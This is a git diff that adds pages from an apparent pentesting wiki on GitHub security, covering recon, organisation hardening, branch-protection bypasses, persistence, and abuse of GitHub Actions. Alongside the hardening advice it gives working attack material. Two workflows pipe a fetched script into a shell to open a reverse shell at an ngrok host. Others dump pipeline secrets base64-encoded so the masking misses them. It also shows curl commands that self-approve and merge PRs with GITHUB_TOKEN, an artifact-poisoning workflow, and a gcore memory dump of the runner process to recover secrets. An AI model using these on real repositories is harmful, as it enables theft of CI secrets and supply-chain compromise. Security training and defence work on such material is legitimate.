+{% endhint %} + +## What is Github + +(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**. + +### Basic Information + +{% content-ref url="basic-github-information.md" %} +[basic-github-information.md](basic-github-information.md) +{% endcontent-ref %} + +## External Recon + +Github repositories can be configured as public, private and internal. + +* **Private** means that **only** people of the **organisation** will be able to access them +* **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it +* **Public** means that **all internet** is going to be able to access it. + +In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**. + +### Github Dorks + +Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. + +Tools (each tool contains its list of dorks): + +* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks)) +* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) +* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists)) + +### Github Leaks + +Please, note that the github dorks are also meant to search for leaks using github search options. 
This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits). + +Tools (each tool contains its list of regexes): + +* [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) +* [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) +* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) +* [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) +* [https://github.com/anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets) +* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks) +* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) + +{% hint style="warning" %} +When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! +{% endhint %} + +### External Forks + +It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork). + +### Github Leaks in deleted/internal forks + +Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here: + +{% content-ref url="accessible-deleted-data-in-github.md" %} +[accessible-deleted-data-in-github.md](accessible-deleted-data-in-github.md) +{% endcontent-ref %} + +## Organization Hardening + +### Member Privileges + +There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs). 
+ +* **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. +* **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. +* **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. +* **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. + * _I couldn't find this info in the APIs response, share if you do_ +* **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. + * _I couldn't find this info in the APIs response, share if you do_ +* **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** + * _I couldn't find this info in the APIs response, share if you do_ +* **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. + * _I couldn't find this info in the APIs response, share if you do_ +* **More things can be configured** in this page but the previous are the ones more security related. + +### Actions Settings + +Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`. 
+ +{% hint style="info" %} +Note that all this configurations can also be set on each repository independently +{% endhint %} + +* **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. + * [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) +* **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. + * _I couldn't find an API with this info, share if you do_ +* **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. + * _I couldn't find an API with this info, share if you do_ +* **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB\_TOKEN given to running workflows. + * [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) + +### Integrations + +_Let me know if you know the API endpoint to access this info!_ + +* **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). +* **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). + +## Recon & Attacks abusing credentials + +For this scenario we are going to suppose that you have obtained some access to a github account. 
+ +### With User Credentials + +If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.** + +Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. + +{% hint style="info" %} +Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. +{% endhint %} + +Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. + +### With User SSH Key + +Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). + +With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to: + +```bash +# Go to the the repository folder +# Get repo config and current user name and email +git config --list +``` + +If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. + +**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. 
+ +#### GPG Keys + +As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. + +Check locally if the current user has any key with: + +```shell +gpg --list-secret-keys --keyid-format=long +``` + +### With User Token + +For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens). + +A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions. + +A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` + +### With Oauth Application + +For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications). + +An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. + +These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them. + +Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. + +### With Github Application + +For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications). + +An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. 
+ +Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. + +## Compromise & Abuse Github Action + +There are several techniques to compromise and abuse a Github Action, check them here: + +{% content-ref url="abusing-github-actions/" %} +[abusing-github-actions](abusing-github-actions/) +{% endcontent-ref %} + +## Branch Protection Bypass + +* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way. + * _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ +* **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. +* **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. + * When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** +* **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. +* **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. +* **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. 
+* **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. +* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). + * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. + +## Bypass Environments Protections + +For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments). + +In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one). + +Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. 
+ +```yaml + push: # Run it when a push is made to a branch + branches: + - current_branch_name #Use '**' to run when a push is made to any branch +``` + +Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. + +## Persistence + +* Generate **user token** +* Steal **github tokens** from **secrets** + * **Deletion** of workflow **results** and **branches** +* Give **more permissions to all the org** +* Create **webhooks** to exfiltrate information +* Invite **outside collaborators** +* **Remove** **webhooks** used by the **SIEM** +* Create/modify **Github Action** with a **backdoor** +* Find **vulnerable Github Action to command injection** via **secret** value modification + +### Imposter Commits - Backdoor via repo commits + +In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**. + +Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): + +```yaml +name: example +on: [push] +jobs: + commit: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e + - shell: bash + run: | + echo 'hello world!' 
+``` + +For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/pentesting-ci-cd/github-security/abusing-github-actions/README.md new file mode 100644 index 0000000000..f6d755b44c --- /dev/null +++ b/pentesting-ci-cd/github-security/abusing-github-actions/README.md @@ -0,0 +1,615 @@ +# Abusing Github Actions + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +In this page you will find: + +* A **summary of all the impacts** of an attacker managing to access a Github Action +* Different ways to **get access to an action**: + * Having **permissions** to create the action + * Abusing **pull request** related triggers + * Abusing **other external access** techniques + * **Pivoting** from an already compromised repo +* Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) + +## Impacts Summary + +For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions). + +If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to: + +* **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP. +* **Compromise deployments** and other **artifacts**. + * If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. +* **Execute code in custom workers** to abuse computing power and pivot to other systems. +* **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. + +## GITHUB\_TOKEN + +This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option: + +
+ +This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) + +{% hint style="warning" %} +Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. +{% endhint %} + +You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github\_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) + +Note that the token **expires after the job has completed**.\ +These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` + +Some interesting things you can do with this token: + +{% tabs %} +{% tab title="Merge PR" %} +```bash +# Merge PR +curl -X PUT \ + https://api.github.com/repos///pulls//merge \ + -H "Accept: application/vnd.github.v3+json" \ + --header "authorization: Bearer $GITHUB_TOKEN" \ + --header 'content-type: application/json' \ + -d '{"commit_title":"commit_title"}' +``` +{% endtab %} + +{% tab title="Approve PR" %} +```bash +# Approve a PR +curl -X POST \ + https://api.github.com/repos///pulls//reviews \ + -H "Accept: application/vnd.github.v3+json" \ + --header "authorization: Bearer $GITHUB_TOKEN" \ + --header 'content-type: application/json' \ + -d '{"event":"APPROVE"}' +``` +{% endtab %} + +{% tab title="Create PR" %} +```bash +# Create a PR +curl -X POST \ + -H "Accept: application/vnd.github.v3+json" \ + --header "authorization: Bearer $GITHUB_TOKEN" \ + --header 'content-type: application/json' \ + https://api.github.com/repos///pulls \ + -d '{"head":"","base":"master", "title":"title"}' +``` +{% endtab %} +{% endtabs %} + +{% hint 
style="danger" %} +Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. +{% endhint %} + +
+ +List secrets in Github Action output + +```yaml +name: list_env +on: + workflow_dispatch: # Launch manually + pull_request: #Run it when a PR is created to a branch + branches: + - '**' + push: # Run it when a push is made to a branch + branches: + - '**' +jobs: + List_env: + runs-on: ubuntu-latest + steps: + - name: List Env + # Need to base64 encode or github will change the secret value for "***" + run: sh -c 'env | grep "secret_" | base64 -w0' + env: + secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} + secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +``` + +
+ +
+ +Get reverse shell with secrets + +```yaml +name: revshell +on: + workflow_dispatch: # Launch manually + pull_request: #Run it when a PR is created to a branch + branches: + - '**' + push: # Run it when a push is made to a branch + branches: + - '**' +jobs: + create_pull_request: + runs-on: ubuntu-latest + steps: + - name: Get Rev Shell + run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' + env: + secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} + secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +``` + +
+ +It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions: + +
+ +## Allowed Execution + +{% hint style="info" %} +This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. + +If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). +{% endhint %} + +### Execution from Repo Creation + +In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**. + +### Execution from a New Branch + +If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). + +You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): + +```yaml +on: + workflow_dispatch: # Launch manually + pull_request: #Run it when a PR is created to a branch + branches: + - master + push: # Run it when a push is made to a branch + branches: + - current_branch_name + +# Use '**' instead of a branh name to trigger the action in all the cranches +``` + +*** + +## Forked Execution + +{% hint style="info" %} +There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. 
+{% endhint %} + +### `pull_request` + +The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow: + +
+ +{% hint style="info" %} +As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. + +**I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ +{% endhint %} + +Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): + +> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**. + +An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations. + +{% hint style="danger" %} +**Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** +{% endhint %} + +As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**. + +### **`pull_request_target`** + +The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission). + +Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). 
For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\ +Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). + +It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**. + +An this one will have **access to secrets**. + +### `workflow_run` + +The [**workflow\_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. + +In this example, a workflow is configured to run after the separate "Run Tests" workflow completes: + +```yaml +on: + workflow_run: + workflows: [Run Tests] + types: + - completed +``` + +Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**. + +This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\ +The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**. 
+ +### `workflow_call` + +TODO + +TODO: Check if when executed from a pull\_request the used/downloaded code if the one from the origin or from the forked PR + +## Abusing Forked Execution + +We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused: + +### Untrusted checkout execution + +In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request). + +In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**. + +{% hint style="danger" %} +However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded): +{% endhint %} + +
# INSECURE. Provided as an example only.
+on:
+  pull_request_target
+
+jobs:
+  build:
+    name: Build and test
+    runs-on: ubuntu-latest
+    steps:
+    - uses: actions/checkout@v2
+      with:
+        ref: ${{ github.event.pull_request.head.sha }}
+
+    - uses: actions/setup-node@v1
+    - run: |
+        npm install
+        npm build
+
+    - uses: completely/fakeaction@v2
+      with:
+        arg1: ${{ secrets.supersecret }}
+
+    - uses: fakerepo/comment-on-pr@v1
+      with:
+        message: |
+          Thank you!
+
+ +The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**. + +{% hint style="warning" %} +A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR). +{% endhint %} + +### Context Script Injections + +Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:** + +{% content-ref url="gh-actions-context-script-injections.md" %} +[gh-actions-context-script-injections.md](gh-actions-context-script-injections.md) +{% endcontent-ref %} + +### **GITHUB\_ENV Script Injection** + +From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file. + +If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD\_PRELOAD** or **NODE\_OPTIONS**. + +For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it: + +
+ +### Vulnerable Third Party Github Actions + +#### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact) + +As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories. + +The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact. + +Example of vulnerable workflow: + +```yaml +on: + workflow_run: + workflows: ["some workflow"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: download artifact + uses: dawidd6/action-download-artifact + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: artifact + - run: python ./script.py + with: + name: artifact + path: ./script.py +``` + +This could be attacked with this workflow: + +```yaml +name: "some workflow" +on: pull_request + +jobs: + upload: + runs-on: ubuntu-latest + steps: + - run: echo "print('exploited')" > ./script.py + - uses actions/upload-artifact@v2 + with: + name: artifact + path: ./script.py +``` + +*** + +## Other External Access + +### Deleted Namespace Repo Hijacking + +If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted. + +{% hint style="danger" %} +So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action. 
+{% endhint %} + +If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/) + +*** + +## Repo Pivoting + +{% hint style="info" %} +In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section). +{% endhint %} + +### Cache Poisoning + +A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow. + +{% content-ref url="gh-actions-cache-poisoning.md" %} +[gh-actions-cache-poisoning.md](gh-actions-cache-poisoning.md) +{% endcontent-ref %} + +### Artifact Poisoning + +Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**: + +{% content-ref url="gh-actions-artifact-poisoning.md" %} +[gh-actions-artifact-poisoning.md](gh-actions-artifact-poisoning.md) +{% endcontent-ref %} + +*** + +## Post Exploitation from an Action + +### Accessing AWS and GCP via OIDC + +Check the following pages: + +{% content-ref url="../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md" %} +[aws-federation-abuse.md](../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) +{% endcontent-ref %} + +{% content-ref url="../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md" %} 
+[gcp-federation-abuse.md](../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) +{% endcontent-ref %} + +### Accessing secrets + +If you are injecting content into a script it's interesting to know how you can access secrets: + +* If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**. + +
+ +List secrets in Github Action output + +```yaml +name: list_env +on: + workflow_dispatch: # Launch manually + pull_request: #Run it when a PR is created to a branch + branches: + - '**' + push: # Run it when a push is made to a branch + branches: + - '**' +jobs: + List_env: + runs-on: ubuntu-latest + steps: + - name: List Env + # Need to base64 encode or github will change the secret value for "***" + run: sh -c 'env | grep "secret_" | base64 -w0' + env: + secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} + + secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +``` + +
+ +
+ +Get reverse shell with secrets + +```yaml +name: revshell +on: + workflow_dispatch: # Launch manually + pull_request: #Run it when a PR is created to a branch + branches: + - '**' + push: # Run it when a push is made to a branch + branches: + - '**' +jobs: + create_pull_request: + runs-on: ubuntu-latest + steps: + - name: Get Rev Shell + run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' + env: + secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} + secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +``` + +
+ +* If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible. + * ```bash + cat /home/runner/work/_temp/* + ``` +* For a JavaScript actions the secrets and sent through environment variables + * ```bash + ps axe | grep node + ``` +* For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**: + + ```yaml + uses: fakeaction/publish@v3 + with: + key: ${{ secrets.PUBLISH_KEY }} + ``` + +### Abusing Self-hosted runners + +The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml. + +**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one. + +In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory: + +{% code overflow="wrap" %} +```bash +sudo apt-get install -y gdb +sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')" +``` +{% endcode %} + +Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/). + +### Github Docker Images Registry + +It's possible to make Github actions that will **build and store a Docker image inside Github**.\ +An example can be find in the following expandable: + +
